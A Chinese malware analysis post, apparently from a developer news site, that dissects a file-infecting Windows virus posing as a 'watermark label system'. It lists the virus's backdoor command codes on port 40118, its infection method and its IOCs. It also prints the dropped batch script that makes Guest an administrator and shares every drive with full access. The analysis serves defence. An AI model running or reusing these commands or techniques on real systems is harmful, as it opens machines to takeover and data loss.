一例恶搞的样本的分析

概述

这个病毒会将自身伪装成水印标签系统,通过感染桌面和U盘中的后缀名为.doc、.xls、.jpg、.rar的文件来传播。会监听本地的40118端口,预留一个简单的后门,利用这个后门可远程执行锁屏、关机、加密文件、开启文件共享等操作。

样本的基本信息

MD5:    5E63F3294520B7C07EB4DA38A2BEA301
SHA1:    B45BCE0FCE6A0C3BA88A1778FA66A576B7D50895
SHA256:    E06A844642002E898F39BBD82FF06133FAA21DECE8EDB719E7A8EDC5C0C541F6
Verified:    Unsigned
Link date:    19:52 2007/7/5
Company:    sjz  

图标如下。

样本分析

首先,初始化winsock库,读取文件 %commonprogramfiles%\Microsoft Shared\Index.dat,若该文件存在,第1个word为1104的话,关机;第1个word为1105,则创建一个窗口,覆盖当前桌面,阻止用户的操作。

在开始目录下,创建一个启动项。在目录C:\Documents and Settings\[username]\Start Menu\Programs\Startup下创建一个快捷方式,名为水印标签系统.lnk,指向病毒母体%commonprogramfiles%\Microsoft Shared\resvr.exe

接下来分三种情况。

第一种情况

若当前程序为%commonprogramfiles%\Microsoft Shared\resvr.exe,即开机自启动的情形。

创建互斥量40S118T2013,若存在同名互斥量,则退出。接着感染桌面上和新插入的U盘中后缀为.doc .xls .jpg .rar的文件,至于如何检测U的插入和感染这4种文件,后面会讲到。

该病毒会监听本地的TCP 40118端口,根据接收的数据的第1个WORD来执行不同的操作。

  • 1003 响应0x87654321,表示存活。

  • 1104 关机,响应0x87654321,根据接收到数据的第3个byte是否大于1,来决定是否写入Index.dat,用于启动时执行关机。

  • 1105 创建一个窗口,覆盖当前桌面,响应0x87654321,根据接收到数据的第3个byte是否大于1,来决定是否写入Index.dat,用于启动时执行锁屏。

  • 1106 向上面创建的窗口发送一个WM_CLOSE消息,用于关闭锁屏的的窗口,响应0x87654321。

  • 1109 会加密或解密桌面上和新插入的移动存储介质中的所有文件,响应0x87654321,加解密方法为将文件内容与0x5FF80F64异或。

  • 1107 创建并执行一个bat文件(X.dat,如下所示),启用系统的文件共享,将系统所有盘符设置共享,然后自毁,响应0x87654321。

    创建并启动一个bat文件%commonprogramfiles%\Microsoft Shared\X.dat,内容如下
    net start Server
    net user Guest Guest /add
    net user Guest /active:yes
    net user Guest Guest
    net localgroup administrators Guest /add
    net share C$=C: /grant:everyone,full
    net share D$=D: /grant:everyone,full
    net share E$=E: /grant:everyone,full
    ...
    del /a /f /q %0
    exit
    
  • 1108 创建并执行一个bat文件(X.dat,如下),用于关闭文件共享,执行后自毁,响应0x87654321。

    net start Server
    net user Guest /active:no
    del /a /f /q %0
    exit
    
  • 1112 从资源节中释放一个pe,保存为Message.exe,并运行,该程序弹出一个对话框,然后自毁,响应0x87654321

  • 7 从recv_buf中提取一个文件名,对其进行感染(后面会用到)。

第二种情况

若当前程序没有与其它文件结合,即不是感染体。将当前程序文件拷贝到%commonprogramfiles%\Microsoft Shared\resvr.exe,并隐藏,执行resvr.exe, 然后自毁。这是感染系统的情形。

第三种情况

若当前程序是被感染后的文件(感染体) 病毒+目标文件。这是从感染文件启动的情形。

这种情况下,又分成两种小情况:

  • 若当前系统中不存在文件%commonprogramfiles%\Microsoft Shared\resvr.exe,说明当前系统未被感染,将病毒母体释放在%commonprogramfiles%\Microsoft Shared\resvr.exe,释放并打开被感染的原始文件。

  • 若当前系统中存在文件%commonprogramfiles%\Common\Microsoft Shared\resvr.exe,说明当前系统未被感染,释放并打开被感染的原始文件。

然后向本地的TCP 40118端口发送一个消息,控制指令为7,重新感染释放出来的原始文件。执行%commonprogramfiles%\Microsoft Shared\resvr.exe,最后自毁。

感染行为

下面重点讲一下该病毒是如何感染文件的。该病毒会遍历系统桌面上的文件,会检测可移动存储介质的插入,寻找后缀名为.doc、.xls、.jpg、.rar的文件进行感染。

感染的过程:将目标文件作为overley部分保存在病毒母体之后,将目标文件的后缀名、文件大小存放在病毒文件中。

作者在PE前2000字节中,寻找0x11111111 ,在0x11111111之后插入目标文件大小(VA为0x00402004),找到 0x22222222 ,在0x22222222之后插入目标文件的后缀名(VA为0x0040200C)。然后将PE的的icon修改为相应格式的icon,这些ICON保存在病毒的资源的icon节中,其中序号1到5分别对应标签水印系统、word文件、excel文件、图片、rar压缩包的图标。最后使用生成的组合文件替换目标文件,后缀为.exe。

当被感染的文件被点击时,执行前面第三种情况,病毒会读取目标文件的后缀名和文件大小,将其释放在原目录,使用资源管理器打开,然后再重新感染。

对U盘的监测

该病毒通过GetLogicalDrives来检测是否是新的盘符出现,当有新的盘符出现,就会执行感染操作。

感染症状

感染前的样子

感染后的样本

加密后的文件


锁屏的样子

IOC

文件%commonprogramfiles%\Microsoft Shared\resvr.exe 病毒母体
%commonprogramfiles%\Microsoft Shared\Index.dat 保存用于启动时执行操作 关机或锁屏
C:\Documents and Settings\[username]\Start Menu\Programs\Startup\水印标签系统.lnk 开机启动项
%commonprogramfiles%\Microsoft Shared\X.dat 临时的bat文件,运行完会自毁
%commonprogramfiles%\Microsoft Shared\Message.exe 弹出一个消息窗口,运行完会自毁 

总结

这个样本没有网络行为,应该是在内网使用,不排除恶作剧的嫌疑。

参考资料

  • [原创][分享]感染型病毒(Virus.Win32.Crypmodadv.A)的分析报告-软件逆向-看雪-安全社区|安全招聘|kanxue.com

  • 一个感染型木马病毒分析(一)-CSDN博客

  • 一个感染型木马病毒分析(一)_trojan.crypmodadv-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/134587.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Azure 架构师学习笔记】-Azure Storage Account(5)- Data Lake layers

本文属于【Azure 架构师学习笔记】系列。 本文属于【Azure Storage Account】系列。 接上文 【Azure 架构师学习笔记】-Azure Storage Account(4)- ADF 读取Queue Storage 前言 不管在云还是非云环境中, 存储是IT 系统的其中一个核心组件。在…

Educational Codeforces Round 157 (A--D)视频详解

Educational Codeforces Round 157 &#xff08;A--D&#xff09;视频详解 视频链接A题代码B题代码C题代码D题代码 视频链接 Educational Codeforces Round 157 &#xff08;A–D&#xff09;视频详解 A题代码 #include<bits/stdc.h> #define endl \n #define deb(x)…

React 其他常用Hooks

1. useImperativeHandle 在react中父组件可以通过forwardRef将ref转发到子组件&#xff1b;子组件拿到父组件创建的ref&#xff0c;绑定到自己的某个元素&#xff1b; forwardRef的做法本身没有什么问题&#xff0c;但是我们是将子组件的DOM直接暴露给了父组件&#xff0c;某下…

shopee、亚马逊卖家如何安全给自己店铺测评?稳定测评环境是关键

大家都知道通过测评可以提升产品的转化率&#xff0c;提升产品的销量&#xff0c;那么做跨境平台的卖家如何安全的给自己店铺测评呢&#xff1f; 无论是亚马逊、拼多多Temu、shopee、Lazada、wish、速卖通、敦煌网、Wayfair、雅虎、eBay、Newegg、乐天、美客多、阿里国际、沃尔…

【数据结构】树与二叉树(五):二叉树的顺序存储(初始化,插入结点,获取父节点、左右子节点等)

文章目录 5.1 树的基本概念5.1.1 树的定义5.1.2 森林的定义5.1.3 树的术语5.1.4 树的表示 5.2 二叉树5.2.1 二叉树1. 定义2. 特点3. 性质引理5.1&#xff1a;二叉树中层数为i的结点至多有 2 i 2^i 2i个&#xff0c;其中 i ≥ 0 i \geq 0 i≥0。引理5.2&#xff1a;高度为k的二叉…

Flink(一)【WordCount 快速入门】

前言 学完了 Hadoop、Spark&#xff0c;本想着先把 Kafka、Flume 这些工具先学完的&#xff0c;但想了想还是把核心的技术先学完最后再去把那些工具学学。 最近心有点累哈哈哈&#xff0c;偷偷立个 flag&#xff0c;反正也没人看&#xff0c;明年的今天来这里还愿哈&#xff0c…

基于Java Web的在线教学质量评价系统的设计与实现

末尾获取源码 开发语言&#xff1a;Java Java开发工具&#xff1a;JDK1.8 后端框架&#xff1a;SSM 前端&#xff1a;Vue 数据库&#xff1a;MySQL5.7和Navicat管理工具结合 服务器&#xff1a;Tomcat8.5 开发软件&#xff1a;IDEA / Eclipse 是否Maven项目&#xff1a;是 目录…

机器学习——回归

目录 一、线性回归 1、回归的概念&#xff08;Regression、Prediction&#xff09; 2、符号约定 3、算法流程 4、最小二乘法&#xff08;LSM&#xff09; 二、梯度下降 梯度下降的三种形式 1、批量梯度下降&#xff08;Batch Gradient Descent,BGD&#xff09;&#xff…

MES系统防呆措施之具体场景学习

在工业设计上&#xff0c;为了避免使用者的操作失误造成机器或人身伤害&#xff08;包括无意识的动作或下意识的误动作或不小心的肢体动作&#xff09;&#xff0c;会针对这些可能发生的情况来做预防措施&#xff0c;称为防呆。对于注塑生产企业来讲&#xff0c;模具亦是企业的…

MinGW32丢失dll文件

问题现象 执行Makefile的时候&#xff0c;突然出现这个提示&#xff0c;还有好几个类似的&#xff0c;提示我找不到dll文件&#xff0c;建议重装。 问题分析 重装软件 最直接的办法肯定是按照建议来重装&#xff0c;但是发现重装了好几次&#xff0c;不是缺这个就是缺那个&a…

Linux多线程【线程池】

✨个人主页&#xff1a; 北 海 &#x1f389;所属专栏&#xff1a; Linux学习之旅 &#x1f383;操作环境&#xff1a; CentOS 7.6 腾讯云远程服务器 文章目录 &#x1f307;前言&#x1f3d9;️正文1.线程池的概念1.1.池化技术1.2.线程池的优点1.3.线程池的应用场景 2.线程池的…

Vue路由使用参数传递数据

一、使用query参数传递数据 &#xff08;一&#xff09;参数的传递 1. 携带参数进行传递 <router-link to"/路径?参数名1参数值1&参数名2参数值2">内容</router-link> 我们在下面的代码中传递每条消息的id和标题&#xff1a; 2. 配置对象进行传递…

运动想象 EEG 信号分析

基于运动想象的公开数据集&#xff1a;Data set IVa (BCI Competition III)1 数据描述参考前文&#xff1a;https://blog.csdn.net/qq_43811536/article/details/134224005?spm1001.2014.3001.5501 本文使用公开数据集 Data set IVa 中的部分被试数据&#xff0c;数据已公开可…

C#在.NET Windows窗体应用中使用LINQtoSQL

目录 一、新建Windows窗体应用并添加LINQtoSQL类 二、错误信息CS0234 三、添加扩展包让Windows窗体应用支持LINQtoSQL类 默认安装的背景下&#xff0c;新建的Windows窗体应用是不支持LINQtoSQL类的。现象是资源管理器里的依赖项中默认的安装不能自动生成支持system.data.lin…

如何在Python爬虫中使用IP代理以避免反爬虫机制

目录 前言 一、IP代理的使用 1. 什么是IP代理&#xff1f; 2. 如何获取IP代理&#xff1f; 3. 如何使用IP代理&#xff1f; 4. 如何避免IP代理失效&#xff1f; 5. 代理IP的匿名性 二、代码示例 总结 前言 在进行爬虫时&#xff0c;我们很容易会遇到反爬虫机制。网站…

JS操作字符串常见方法

目录 一&#xff1a;前言 二&#xff1a;常见的内置方法 1、charAt与charCodeAt 2、indexOf与lastIndexOf 3、substring与substr 4、toLowerCase 和 toUpperCase 5、slice 6、replace 7、split 8、concat 9、trim 10、trimStart / trimLeft 11、trimEnd / trimRigh…

flutter开发报错The instance member ‘widget‘ can‘t be accessed in an initializer

文章目录 问题描述问题原因解决方法 问题描述 The instance member ‘widget’ can’t be accessed in an initializer. 问题原因 “The instance member ‘widget’ can’t be accessed in an initializer” 错误是因为在初始化器列表中&#xff08;constructor initializer…

[ACTF2020 新生赛]Upload 1

题目环境&#xff1a; 仍旧是文件上传漏洞 这道题和上一道大差不差、大同小异、这里不再赘述。 [极客大挑战 2019]Upload 1&#xff1a;https://blog.csdn.net/m0_73734159/article/details/134267317?spm1001.2014.3001.5501 区别在于本题需要在抓包数据里面改文件后缀&#…

2023年11月5日网规考试备忘

早上题目回忆&#xff1a; pki体系 ipsec&#xff0c;交换安全&#xff08;流量抑制&#xff09; aohdlc bob metclaf —ethernet pon tcp三次握手 OSPF lsa&#xff1f;交换机组ospf配置问题&#xff0c;ping网关可通&#xff0c;AB不通 raid6 300G*8 网络利用率 停等协议10…

《009.Springboot+vue之进销存管理系统》

《009.Springbootvue之进销存管理系统》 项目简介 [1]本系统涉及到的技术主要如下&#xff1a; 推荐环境配置&#xff1a;DEA jdk1.8 Maven MySQL 前后端分离; 后台&#xff1a;SpringBootMybatisredis; 前台&#xff1a;vueElementUI; [2]功能模块展示&#xff1a; 1.用户管…